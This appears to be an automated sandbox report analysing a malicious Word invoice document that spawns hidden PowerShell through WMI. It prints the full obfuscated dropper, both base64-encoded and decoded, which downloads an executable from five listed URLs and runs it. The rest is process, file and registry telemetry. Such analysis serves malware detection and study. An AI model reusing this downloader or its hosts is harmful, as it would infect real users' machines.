AGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA

Source: INV_PO_12172019EX.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\INV_PO_12172019EX.doc

Source: INV_PO_12172019EX.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$V_PO_12172019EX.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6E5B.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDOC@2/19@6/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: INV_PO_12172019EX.doc	OLE document summary: edited time not present or 0
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~DFD6589A193BC4C172.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFD6589A193BC4C172.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFD6589A193BC4C172.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~DF413F6883B338D566.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF413F6883B338D566.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF413F6883B338D566.TMP.0.dr	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\system32\MSFTEDIT.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: tomation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb56a source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdbIL source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb1. source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: emti.pdb source: powershell.exe, 00000005.00000002.941139445.000000001B3A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbll source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8ystem.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp

Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 264

Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded $Npzfrnzbrtium='Vffuwyhyigiyq';$Esxtydjpk = '873';$Ylnjqsscmpm='Wylqaidkqa';$Imxfrxtapo=$env:userprofile+'\'+$Esxtydjpk+'.exe';$Rryipjfhd='Ytidncigle';$Uwudrmogjlosm=&('new-'+'objec'+'t') neT.WEBcLIeNT;$Gpckyscyaendz='http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/'."s`PLit"('*');$Ixiqogfikm='Bttxghvinomws';foreach($Mbcnzgspat in $Gpckyscyaendz){try{$Uwudrmogjlosm."DOW`NLO`AD`FIlE"($Mbcnzgspat, $Imxfrxtapo);$Hhtobffplgs='Xaympicu';If ((.('G'+'et-'+'Item') $Imxfrxtapo)."l`EnG`TH" -ge 27169) {[Diagnostics.Process]::"sT`ARt"($Imxfrxtapo);$Eidytkly='Ybqxcuvdiqn';break;$Lmqahjcwywtk='Gwauuhlz'}}catch{}}$Onogqbumo='Ldkeogsafxnj'

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -en jaboahaaegbmahiabgb6agiacgb0agkadqbtad0ajwbwagyazgb1ahcaeqboahkaaqbnagkaeqbxaccaowakaeuacwb4ahqaeqbkagoacabracaapqagaccaoaa3admajwa7acqawqbsag4aagbxahmacwbjag0acabtad0ajwbxahkababxageaaqbkagsacqbhaccaowakaekabqb4agyacgb4ahqayqbwag8apqakaguabgb2adoadqbzaguacgbwahiabwbmagkabablacsajwbcaccakwakaeuacwb4ahqaeqbkagoacabracsajwauaguaeablaccaowakafiacgb5agkacabqagyaaabkad0ajwbzahqaaqbkag4aywbpagcabablaccaowakafuadwb1agqacgbtag8azwbqagwabwbzag0apqamacgajwbuaguadwataccakwanag8aygbqaguaywanacsajwb0accakqagag4azqbuac4avwbfaeiaywbmaekazqboafqaowakaecacabjagsaeqbzagmaeqbhaguabgbkahoapqanaggadab0ahaaogavac8ayqbtahmadabhagyazgbyaguaywbvahiazabzac4aywbvag0alwbpag4azabpahyaaqbkahuayqbsaeeacabpac8amaavacoaaab0ahqacaa6ac8alwbmag8abwb6ag8abwbwac4aywbvag0alwb3ahaalqbjag8abgb0aguabgb0ac8auqb4agkanwbpafyaraavacoaaab0ahqacaa6ac8alwa3ageacgbhahmacabvahiadaauagmabwbtac8adgbhagwaaqbkageadablagyaaqblagwazaavagcaagavacoaaab0ahqacaa6ac8alwbkaguadgayac4azqbrahqabwbuaguabgbkag8abgauagcacgavagmazwbpac0aygbpag4alwbtafqavabdaeyabqbwagualwaqaggadab0ahaacwa6ac8alwbkagkayqbnag4abwbzahqaaqbjagealqbwahiabwbkahuaywb0ahmalgbjag8abqavahcacaatageazabtagkabgavaggaaqbvadiadqa3ahcalwanac4aigbzagaauabmagkadaaiacgajwaqaccakqa7acqasqb4agkacqbvagcazgbpagsabqa9accaqgb0ahqaeabnaggadgbpag4abwbtahcacwanadsazgbvahiazqbhagmaaaaoacqatqbiagmabgb6agcacwbwageadaagagkabgagacqarwbwagmaawb5ahmaywb5ageazqbuagqaegapahsadabyahkaewakafuadwb1agqacgbtag8azwbqagwabwbzag0algaiaeqatwbxagaatgbmae8ayabbaeqayabgaekababfaciakaakae0aygbjag4aegbnahmacabhahqalaagacqasqbtahgazgbyahgadabhahaabwapadsajabiaggadabvagiazgbmahaababnahmapqanafgayqb5ag0acabpagmadqanadsasqbmacaakaaoac4akaanaecajwaraccazqb0ac0ajwaraccasqb0aguabqanackaiaakaekabqb4agyacgb4ahqayqbwag8akqauaciababgaeuabgbhagaavabiaciaiaatagcazqagadianwaxadyaoqapacaaewbbaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoaigbzafqayabbafiadaaiacgajabjag0aeabmahiaeab0ageacabvackaowakaeuaaqbkahkadabragwaeqa9accawqbiaheaeabjahuadgbkagkacqbuaccaowbiahiazqbhagsaowakaewabqbxageaaabqagmadwb5ahcadabrad0ajwbhahcayqb1ahuaaabsahoajwb9ah0aywbhahqaywboahsafqb9acqatwbuag8azwbxagiadqbtag8apqanaewazabraguabwbnahmayqbmahgabgbqacca

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
